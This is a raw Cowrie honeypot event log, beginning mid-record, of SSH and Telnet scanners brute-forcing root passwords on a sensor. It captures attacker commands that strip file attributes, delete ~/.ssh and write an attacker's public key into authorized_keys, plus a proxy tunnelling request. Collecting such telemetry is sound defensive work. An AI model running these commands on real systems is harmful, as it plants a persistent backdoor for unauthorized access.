519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:57:19.085786Z","src_ip":"103.12.154.87","session":"2a87f13f60da"}
{"eventid":"cowrie.login.failed","username":"pliki","password":"pliki","message":"login attempt [pliki/pliki] failed","sensor":"my-vps","timestamp":"2025-08-26T06:57:20.507080Z","src_ip":"103.12.154.87","session":"2a87f13f60da"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:57:21.740268Z","src_ip":"103.12.154.87","session":"2a87f13f60da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54064,"dst_ip":"1.2.3.4","dst_port":23,"session":"0926c9070730","protocol":"telnet","message":"New connection: 212.227.125.160:54064 (1.2.3.4:23) [session: 0926c9070730]","sensor":"my-vps","timestamp":"2025-08-26T06:57:35.260656Z"}
{"eventid":"cowrie.session.closed","duration":1.953005075454712,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:57:37.213593Z","src_ip":"212.227.125.160","session":"0926c9070730"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44370,"dst_ip":"1.2.3.4","dst_port":23,"session":"85e827f10b40","protocol":"telnet","message":"New connection: 212.227.125.160:44370 (1.2.3.4:23) [session: 85e827f10b40]","sensor":"my-vps","timestamp":"2025-08-26T06:57:37.511212Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:57:38.469495Z","src_ip":"212.227.125.160","session":"85e827f10b40"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:57:38.532284Z","src_ip":"212.227.125.160","session":"85e827f10b40"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"7.6","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:57:46.124269Z","src_ip":"212.227.125.160","session":"85e827f10b40"}
{"eventid":"cowrie.session.closed","duration":8.61670470237732,"message":"Connection lost after 8 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:57:46.127845Z","src_ip":"212.227.125.160","session":"85e827f10b40"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":49620,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab1c88c4063c","protocol":"ssh","message":"New connection: 45.88.8.215:49620 (1.2.3.4:22) [session: ab1c88c4063c]","sensor":"my-vps","timestamp":"2025-08-26T06:57:59.650797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:58:00.073445Z","src_ip":"45.88.8.215","session":"ab1c88c4063c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T06:58:00.074178Z","src_ip":"45.88.8.215","session":"ab1c88c4063c"}
{"eventid":"cowrie.login.success","username":"root","password":"Lakshin@123","message":"login attempt [root/Lakshin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:58:01.929476Z","src_ip":"45.88.8.215","session":"ab1c88c4063c"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:58:02.312040Z","src_ip":"45.88.8.215","session":"ab1c88c4063c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42582,"dst_ip":"1.2.3.4","dst_port":23,"session":"2c47e82799fa","protocol":"telnet","message":"New connection: 212.227.125.160:42582 (1.2.3.4:23) [session: 2c47e82799fa]","sensor":"my-vps","timestamp":"2025-08-26T06:58:24.747209Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":33226,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a8ba1fa67d4","protocol":"ssh","message":"New connection: 103.12.154.87:33226 (1.2.3.4:22) [session: 9a8ba1fa67d4]","sensor":"my-vps","timestamp":"2025-08-26T06:58:39.072563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:58:39.078249Z","src_ip":"103.12.154.87","session":"9a8ba1fa67d4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:58:39.313681Z","src_ip":"103.12.154.87","session":"9a8ba1fa67d4"}
{"eventid":"cowrie.login.success","username":"root","password":"mama1234","message":"login attempt [root/mama1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:58:40.889850Z","src_ip":"103.12.154.87","session":"9a8ba1fa67d4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:58:41.377052Z","src_ip":"103.12.154.87","session":"9a8ba1fa67d4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:58:41.378129Z","src_ip":"103.12.154.87","session":"9a8ba1fa67d4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:58:41.379160Z","src_ip":"103.12.154.87","session":"9a8ba1fa67d4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:58:42.108715Z","src_ip":"103.12.154.87","session":"9a8ba1fa67d4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:58:43.058101Z","src_ip":"103.12.154.87","session":"9a8ba1fa67d4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T06:58:43.058813Z","src_ip":"103.12.154.87","session":"9a8ba1fa67d4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T06:58:43.310754Z","src_ip":"103.12.154.87","session":"9a8ba1fa67d4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:58:43.311615Z","src_ip":"103.12.154.87","session":"9a8ba1fa67d4"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":34838,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9ff6975e2f1","protocol":"ssh","message":"New connection: 103.12.154.87:34838 (1.2.3.4:22) [session: c9ff6975e2f1]","sensor":"my-vps","timestamp":"2025-08-26T06:58:43.507515Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:58:43.511215Z","src_ip":"103.12.154.87","session":"c9ff6975e2f1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:58:43.724191Z","src_ip":"103.12.154.87","session":"c9ff6975e2f1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T06:58:44.570387Z","src_ip":"103.12.154.87","session":"c9ff6975e2f1"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:58:46.284861Z","src_ip":"103.12.154.87","session":"c9ff6975e2f1"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":35794,"dst_ip":"1.2.3.4","dst_port":22,"session":"f77d36893b85","protocol":"ssh","message":"New connection: 103.12.154.87:35794 (1.2.3.4:22) [session: f77d36893b85]","sensor":"my-vps","timestamp":"2025-08-26T06:58:46.501428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:58:46.508852Z","src_ip":"103.12.154.87","session":"f77d36893b85"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:58:46.729520Z","src_ip":"103.12.154.87","session":"f77d36893b85"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:58:47.607690Z","src_ip":"103.12.154.87","session":"f77d36893b85"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:58:47.830097Z","src_ip":"103.12.154.87","session":"f77d36893b85"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:58:47.842174Z","src_ip":"103.12.154.87","session":"9a8ba1fa67d4"}
{"eventid":"cowrie.session.closed","duration":30.58300232887268,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:58:55.330136Z","src_ip":"212.227.125.160","session":"2c47e82799fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39907,"dst_ip":"1.2.3.4","dst_port":22,"session":"62bf47a9f59f","protocol":"ssh","message":"New connection: 212.227.235.229:39907 (1.2.3.4:22) [session: 62bf47a9f59f]","sensor":"my-vps","timestamp":"2025-08-26T06:58:58.195466Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:58:58.196547Z","src_ip":"212.227.235.229","session":"62bf47a9f59f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40277,"dst_ip":"1.2.3.4","dst_port":22,"session":"9974c76f4ecb","protocol":"ssh","message":"New connection: 212.227.235.229:40277 (1.2.3.4:22) [session: 9974c76f4ecb]","sensor":"my-vps","timestamp":"2025-08-26T06:58:58.305938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:58:58.306818Z","src_ip":"212.227.235.229","session":"9974c76f4ecb"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T06:58:58.442245Z","src_ip":"212.227.235.229","session":"9974c76f4ecb"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:58:58.851269Z","src_ip":"212.227.235.229","session":"9974c76f4ecb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T06:58:58.987659Z","session":"9974c76f4ecb"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53236,"dst_ip":"1.2.3.4","dst_port":22,"session":"f94c8bb4b8ef","protocol":"ssh","message":"New connection: 217.72.205.35:53236 (1.2.3.4:22) [session: f94c8bb4b8ef]","sensor":"my-vps","timestamp":"2025-08-26T06:59:25.333702Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:59:25.334841Z","src_ip":"217.72.205.35","session":"f94c8bb4b8ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41182,"dst_ip":"1.2.3.4","dst_port":23,"session":"77c7ec81d0c6","protocol":"telnet","message":"New connection: 212.227.235.229:41182 (1.2.3.4:23) [session: 77c7ec81d0c6]","sensor":"my-vps","timestamp":"2025-08-26T06:59:38.889445Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T06:59:39.303471Z","src_ip":"212.227.235.229","session":"77c7ec81d0c6"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T06:59:40.709282Z","src_ip":"212.227.235.229","session":"77c7ec81d0c6"}
{"eventid":"cowrie.session.closed","duration":2.5169410705566406,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:59:41.406367Z","src_ip":"212.227.235.229","session":"77c7ec81d0c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41196,"dst_ip":"1.2.3.4","dst_port":23,"session":"f863e92c9a59","protocol":"telnet","message":"New connection: 212.227.235.229:41196 (1.2.3.4:23) [session: f863e92c9a59]","sensor":"my-vps","timestamp":"2025-08-26T06:59:41.561608Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:59:41.966172Z","src_ip":"212.227.235.229","session":"f863e92c9a59"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:59:42.040128Z","src_ip":"212.227.235.229","session":"f863e92c9a59"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T06:59:42.224736Z","src_ip":"212.227.235.229","session":"f863e92c9a59"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:59:43.323805Z","src_ip":"212.227.235.229","session":"f863e92c9a59"}
{"eventid":"cowrie.session.closed","duration":1.7660624980926514,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:59:43.327594Z","src_ip":"212.227.235.229","session":"f863e92c9a59"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":59520,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ad45b9e6277","protocol":"ssh","message":"New connection: 103.12.154.87:59520 (1.2.3.4:22) [session: 6ad45b9e6277]","sensor":"my-vps","timestamp":"2025-08-26T07:00:02.960473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:00:02.967700Z","src_ip":"103.12.154.87","session":"6ad45b9e6277"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:00:03.180834Z","src_ip":"103.12.154.87","session":"6ad45b9e6277"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe123qwe","message":"login attempt [root/qwe123qwe] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:00:04.099426Z","src_ip":"103.12.154.87","session":"6ad45b9e6277"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:00:05.074287Z","src_ip":"103.12.154.87","session":"6ad45b9e6277"}
